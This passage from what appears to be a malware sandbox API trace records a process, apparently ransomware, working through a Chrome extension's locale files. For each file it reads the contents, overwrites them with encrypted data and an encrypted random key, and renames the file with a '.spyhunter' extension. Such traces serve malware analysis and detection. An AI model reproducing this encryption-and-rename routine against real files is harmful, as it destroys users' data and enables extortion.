Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.113] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0134.113] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.113] GetProcessHeap () returned 0x2c0000 [0134.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.113] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f604*=0xe3, lpOverlapped=0x0) returned 1 [0134.114] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.114] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x57f604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f604*=0xe3, lpOverlapped=0x0) returned 1 [0134.115] GetProcessHeap () returned 0x2c0000 [0134.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.115] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.115] WriteFile (in: hFile=0x158, lpBuffer=0x57f644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f604, lpOverlapped=0x0 | out: lpBuffer=0x57f644*, lpNumberOfBytesWritten=0x57f604*=0x4, lpOverlapped=0x0) returned 1 [0134.115] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f604, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f604*=0x30, lpOverlapped=0x0) returned 1 [0134.115] CloseHandle (hObject=0x158) returned 1 [0134.115] GetProcessHeap () returned 0x2c0000 [0134.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.115] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.spyhunter") returned 165 [0134.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.spyhunter")) returned 1 [0134.116] GetProcessHeap () returned 0x2c0000 [0134.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.116] GetProcessHeap () returned 0x2c0000 [0134.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.116] GetProcessHeap () returned 0x2c0000 [0134.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6dd08 | out: hHeap=0x2c0000) returned 1 [0134.117] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f640 | out: pbBuffer=0x57f640) returned 1 [0134.117] GetProcessHeap () returned 0x2c0000 [0134.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.117] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f638*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f638*=0x30) returned 1 [0134.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.118] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0134.118] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.118] GetProcessHeap () returned 0x2c0000 [0134.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.118] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f5fc*=0x110, lpOverlapped=0x0) returned 1 [0134.119] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.119] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x57f5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f5fc*=0x110, lpOverlapped=0x0) returned 1 [0134.119] GetProcessHeap () returned 0x2c0000 [0134.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.119] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.119] WriteFile (in: hFile=0x158, lpBuffer=0x57f63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5fc, lpOverlapped=0x0 | out: lpBuffer=0x57f63c*, lpNumberOfBytesWritten=0x57f5fc*=0x4, lpOverlapped=0x0) returned 1 [0134.119] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5fc*=0x30, lpOverlapped=0x0) returned 1 [0134.119] CloseHandle (hObject=0x158) returned 1 [0134.119] GetProcessHeap () returned 0x2c0000 [0134.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.119] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.spyhunter") returned 165 [0134.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.spyhunter")) returned 1 [0134.120] GetProcessHeap () returned 0x2c0000 [0134.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.120] GetProcessHeap () returned 0x2c0000 [0134.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.120] GetProcessHeap () returned 0x2c0000 [0134.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e32030 | out: hHeap=0x2c0000) returned 1 [0134.121] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f638 | out: pbBuffer=0x57f638) returned 1 [0134.121] GetProcessHeap () returned 0x2c0000 [0134.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.121] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f630*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f630*=0x30) returned 1 [0134.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.122] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0134.122] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.122] GetProcessHeap () returned 0x2c0000 [0134.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.122] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f5f4*=0xde, lpOverlapped=0x0) returned 1 [0134.123] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.123] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x57f5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f5f4*=0xde, lpOverlapped=0x0) returned 1 [0134.123] GetProcessHeap () returned 0x2c0000 [0134.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.123] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.123] WriteFile (in: hFile=0x158, lpBuffer=0x57f634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5f4, lpOverlapped=0x0 | out: lpBuffer=0x57f634*, lpNumberOfBytesWritten=0x57f5f4*=0x4, lpOverlapped=0x0) returned 1 [0134.123] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5f4*=0x30, lpOverlapped=0x0) returned 1 [0134.123] CloseHandle (hObject=0x158) returned 1 [0134.123] GetProcessHeap () returned 0x2c0000 [0134.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.124] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.spyhunter") returned 165 [0134.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.spyhunter")) returned 1 [0134.124] GetProcessHeap () returned 0x2c0000 [0134.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.124] GetProcessHeap () returned 0x2c0000 [0134.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.124] GetProcessHeap () returned 0x2c0000 [0134.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e31eb0 | out: hHeap=0x2c0000) returned 1 [0134.125] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f630 | out: pbBuffer=0x57f630) returned 1 [0134.125] GetProcessHeap () returned 0x2c0000 [0134.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.125] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f628*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f628*=0x30) returned 1 [0134.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.126] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0134.126] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.126] GetProcessHeap () returned 0x2c0000 [0134.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.126] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f5ec*=0xe0, lpOverlapped=0x0) returned 1 [0134.127] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.127] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x57f5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f5ec*=0xe0, lpOverlapped=0x0) returned 1 [0134.127] GetProcessHeap () returned 0x2c0000 [0134.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.128] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.128] WriteFile (in: hFile=0x158, lpBuffer=0x57f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5ec, lpOverlapped=0x0 | out: lpBuffer=0x57f62c*, lpNumberOfBytesWritten=0x57f5ec*=0x4, lpOverlapped=0x0) returned 1 [0134.128] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5ec*=0x30, lpOverlapped=0x0) returned 1 [0134.128] CloseHandle (hObject=0x158) returned 1 [0134.128] GetProcessHeap () returned 0x2c0000 [0134.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.128] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.spyhunter") returned 168 [0134.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.spyhunter")) returned 1 [0134.129] GetProcessHeap () returned 0x2c0000 [0134.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.129] GetProcessHeap () returned 0x2c0000 [0134.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.129] GetProcessHeap () returned 0x2c0000 [0134.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d870 | out: hHeap=0x2c0000) returned 1 [0134.130] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f628 | out: pbBuffer=0x57f628) returned 1 [0134.130] GetProcessHeap () returned 0x2c0000 [0134.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.130] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f620*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f620*=0x30) returned 1 [0134.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0134.131] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.131] GetProcessHeap () returned 0x2c0000 [0134.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.131] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f5e4*=0xde, lpOverlapped=0x0) returned 1 [0134.131] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.132] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x57f5e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f5e4*=0xde, lpOverlapped=0x0) returned 1 [0134.132] GetProcessHeap () returned 0x2c0000 [0134.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.132] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.132] WriteFile (in: hFile=0x158, lpBuffer=0x57f624*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f5e4, lpOverlapped=0x0 | out: lpBuffer=0x57f624*, lpNumberOfBytesWritten=0x57f5e4*=0x4, lpOverlapped=0x0) returned 1 [0134.132] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f5e4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f5e4*=0x30, lpOverlapped=0x0) returned 1 [0134.132] CloseHandle (hObject=0x158) returned 1 [0134.132] GetProcessHeap () returned 0x2c0000 [0134.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.132] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.spyhunter") returned 168 [0134.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.spyhunter")) returned 1 [0134.133] GetProcessHeap () returned 0x2c0000 [0134.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.133] GetProcessHeap () returned 0x2c0000 [0134.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.133] GetProcessHeap () returned 0x2c0000 [0134.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d6e8 | out: hHeap=0x2c0000) returned 1 [0134.134] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f620 | out: pbBuffer=0x57f620) returned 1 [0134.134] GetProcessHeap () returned 0x2c0000 [0134.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.134] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f618*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f618*=0x30) returned 1 [0134.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.135] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0134.135] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.135] GetProcessHeap () returned 0x2c0000 [0134.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.135] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f5dc*=0xd9, lpOverlapped=0x0) returned 1 [0134.135] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 